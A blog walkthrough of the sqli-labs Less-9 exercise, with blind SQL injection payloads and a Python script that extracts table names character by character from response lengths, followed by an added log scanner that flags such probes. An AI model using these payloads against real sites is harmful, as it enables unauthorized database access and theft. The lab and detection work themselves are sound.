• Less-9


    Determine where the SQL injection is and which parameter is echoed back


    • The echoed page does not change, which shows that SQL errors are not echoed back

    • or there is no SQL injection vulnerability at all

    Write a Python script that sends the request and looks at what comes back

    import requests
    # Append an always-true condition (and 1=1) and comment out the rest of the query with %23 (#)
    url = "https://sql.alienwares.top/Less-9/?id=1' and 1=1 %23"
    res = requests.get(url)
    print(len(res.content))   # compare this length against the one returned for a false condition
    • The response length for a true condition turns out to be 707

    • The response length for a false condition is 744

    SQL statements

    ?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))='e' %23
    # If a bracket appears in the middle, the return value will be 695

    ?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),0,1) )=','%23

    Python script to start the blind injection

    # 707 = right (condition true)
    # 744 = error (condition false)

    import requests
    import time

    for i in range(1, 100):            # MySQL mid() positions start at 1, not 0
        url = "https://sql.alienwares.top/Less-9/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
        res = requests.get(url)
        time.sleep(1)
        if len(res.content) == 707:    # this position is the comma separating two table names
            print(",", end="")
            continue
        found = False
        for e in range(ord("a"), ord("z") + 1):   # sqli-labs table names are lowercase letters
            url = "https://sql.alienwares.top/Less-9/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
            res = requests.get(url)
            time.sleep(1)
            if len(res.content) == 707:
                print(chr(e), end="")
                found = True
                break
        if not found:                  # neither a comma nor a-z matched: end of the string
            break



    Run result

    The sleep time can be lengthened a little if needed, because of my speed
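As an added example that is not part of the original post, here is the log-side check a defender would want against the probes shown above: it URL-decodes the query parameters in access-log lines, flags requests carrying the `mid(` / `information_schema` enumeration pattern behind a quote-and-comment break, and records the distinct response sizes per client, since two sizes for one page (707 vs 744 here) is exactly the oracle the script keys on. The log lines, IP addresses and the `SAMPLE_LOG` / `scan` names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format); none are real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2021:12:00:01 +0000] "GET /Less-9/?id=1 HTTP/1.1" 200 707
10.0.0.5 - - [10/Jan/2021:12:00:02 +0000] "GET /Less-9/?id=1%27%20and%201=1%20%23 HTTP/1.1" 200 707
10.0.0.5 - - [10/Jan/2021:12:00:03 +0000] "GET /Less-9/?id=1%27%20and%20(select%20mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),1,1))=%27e%27%20%23 HTTP/1.1" 200 707
10.0.0.5 - - [10/Jan/2021:12:00:04 +0000] "GET /Less-9/?id=1%27%20and%20(select%20mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),2,1))=%27a%27%20%23 HTTP/1.1" 200 744
10.0.0.9 - - [10/Jan/2021:12:00:05 +0000] "GET /Less-9/?id=2 HTTP/1.1" 200 707
"""

# client ip, request path, status, response size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]+" (\d{3}) (\d+)')

# Fragments typical of the schema-enumeration probes above, matched after URL-decoding.
SIGNATURES = ("information_schema", "mid(", "group_concat(", "database()")


def decode_params(path: str) -> dict:
    """URL-decode every query parameter of a request path into {name: [values]}."""
    return parse_qs(urlsplit(path).query, keep_blank_values=True)


def is_probe(value: str) -> bool:
    """True when a value breaks out with a quote plus a comment and carries an enumeration signature."""
    v = value.lower()
    breaks_out = "'" in v and ("#" in v or "--" in v or "/*" in v)
    return breaks_out and any(sig in v for sig in SIGNATURES)


def scan(log_text: str) -> dict:
    """Return {client_ip: {"hits": n, "lengths": {response sizes}}} for clients that sent probes."""
    stats = defaultdict(lambda: {"hits": 0, "lengths": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, _status, size = m.groups()
        for values in decode_params(path).values():
            if any(is_probe(v) for v in values):
                stats[ip]["hits"] += 1
                stats[ip]["lengths"].add(int(size))   # >1 size per page = a length oracle in use
                break
    return dict(stats)
```

A plain `and 1=1 #` tautology is deliberately not flagged on its own, so the detector keys on the schema-enumeration payload rather than on every quote in a parameter.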

  • Original address: https://www.cnblogs.com/hackering/p/14235157.html